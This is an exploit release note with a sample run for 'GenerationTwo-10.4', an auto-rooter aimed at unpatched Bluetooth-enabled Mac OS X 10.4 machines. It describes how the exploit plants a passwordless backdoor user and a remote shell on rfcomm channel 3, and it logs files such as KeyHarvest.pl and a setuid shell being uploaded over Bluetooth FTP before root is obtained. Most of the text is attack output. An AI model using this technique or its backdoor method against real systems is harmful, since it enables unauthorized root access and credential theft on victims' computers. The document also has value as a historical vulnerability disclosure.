GenerationTwo-10.4.tar If you are trying to exploit 10.3 you need a different tarball!

Auto rooter for Bluetooth enabled Macintosh machines that are not 
patched to CAN-2005-1333 and CVE-2006-1471.

The Mac OS X 10.4.1 and Mac OS X 10.4.7 Updates combined address the issues involved 
in the exploitation process. 

This exploit provides a remote shell on rfcomm channel 3. A user of 
'pwned mghee' aka 'bluetooth' has been added with no password. You 
should find a setuid root shell in your home dir. 

Here is a sample run against my stock macmini with 10.4 installed with no patches.

10.4.1 may still be affected... I think they borked up the patch

This goes MUCH quicker dues to not having to reboot the system. Thanks for root launchd!
Also launchd, thanks for the reloadttys option on launchctl! You rock. 

kfinisterre@threat:~/GenerationTwo-10.4$ ./10.4-Autoroot
00:0C:41:E2:7A:EE
Connected to 00:0C:41:E2:7A:EE.
ftp> ftp> ftp> ftp> ftp> ftp> 458 bytes sent
ftp> ftp> ftp> ftp> ftp> ftp> ftp> 173324 bytes sent
ftp> ftp> 3192 bytes sent
ftp> 1464 bytes sent
ftp> 1067 bytes sent
ftp> 17000 bytes sent
ftp> 17000 bytes sent
ftp> 90812 bytes sent
ftp> 2743 bytes sent
ftp> 1658 bytes sent
ftp> 2342 bytes sent
ftp> drwxr-xr-x            Aug 16 01:54 ..
-rw-r--r--       3192 Aug 16 01:54 FailureToLaunch-ppc.pl
-rw-r--r--       1464 Aug 16 01:54 KeyHarvest.pl
-rw-r--r--       2743 Aug 16 01:54 login.config
-rw-r--r--      90812 Aug 16 01:54 mgetty
-rw-r--r--       1658 Aug 16 01:54 mgetty.config
-rw-r--r--         12 Aug 16 01:54 objc_sharing_ppc_4294967294
-rw-r--r--         36 Aug 16 01:54 objc_sharing_ppc_501
-rw-r--r--         24 Aug 16 01:54 objc_sharing_ppc_92
-rw-r--r--       1067 Aug 16 01:54 pwn
-rw-r--r--      17000 Aug 16 01:54 sh
-rw-r--r--      17000 Aug 16 01:54 shX
-rw-r--r--       2342 Aug 16 01:54 ttys
ftp> Disconnected.
Connected to 00:0C:41:E2:7A:EE.
ftp> ftp> ftp> Disconnected.
00:0C:41:E2:7A:EE
Connected to 00:0C:41:E2:7A:EE.
ftp> ftp> ftp> ftp> ftp> ftp> 458 bytes sent
ftp> ftp> ftp> ftp> ftp> ftp> ftp> 173324 bytes sent
ftp> ftp> 3192 bytes sent
ftp> 1464 bytes sent
ftp> 1067 bytes sent
ftp> 17000 bytes sent
ftp> 17000 bytes sent
ftp> 90812 bytes sent
ftp> 2743 bytes sent
ftp> 1658 bytes sent
ftp> 2342 bytes sent
ftp> drwxr-xr-x            Aug 16 01:54 ..
-rw-r--r--       3192 Aug 16 01:54 FailureToLaunch-ppc.pl
-rw-r--r--       1464 Aug 16 01:54 KeyHarvest.pl
-rw-r--r--       2743 Aug 16 01:54 login.config
-rw-r--r--      90812 Aug 16 01:54 mgetty
-rw-r--r--       1658 Aug 16 01:54 mgetty.config
-rw-r--r--         36 Aug 16 01:54 objc_sharing_ppc_501
-rw-r--r--         24 Aug 16 01:54 objc_sharing_ppc_92
-rw-r--r--       1067 Aug 16 01:54 pwn
-rw-r--r--      17000 Aug 16 01:54 sh
-rw-r--r--      17000 Aug 16 01:54 shX
-rw-r--r--       2342 Aug 16 01:54 ttys
ftp> Disconnected.
Connected to 00:0C:41:E2:7A:EE.
ftp> ftp> ftp> Disconnected.

kfinisterre@threat:~$ rfcomm connect 0 00:0C:41:E2:7A:EE 3
Connected /dev/rfcomm0 to 00:0C:41:E2:7A:EE on channel 3
Press CTRL-C for hangup

kfinisterre@threat:~$ minicom

Welcome to minicom 2.1

OPTIONS: History Buffer, F-key Macros, Search History Buffer, I18n
Compiled on Nov  5 2005, 15:45:44.

Press CTRL-A Z for help on special keys

k-fs-Computer.local!login: pwned mghee
Password:
Last login: Tue Aug 15 00:45:09 on tty.Blue
Welcome to Darwin!
k-fs-Computer:~ bluetooth$ ls -al
total 48
drwxr-xr-x  4 bluetoot  666      136 15 Aug 00:45 .
drwxrwxr-t  8 root      admin    272 15 Aug 00:26 ..
-rw-------  1 bluetoot  666        5 15 Aug 00:45 .bash_history
-rwsr-xr-x  1 root      666    17000 15 Aug 00:42 shX
k-fs-Computer:~ bluetooth$ ./shX
csh: No entry for terminal type "unknown"
csh: using dumb terminal settings.
[k-fs-Computer:~] bluetoot# id
uid=0(root) gid=0(wheel) groups=0(wheel)

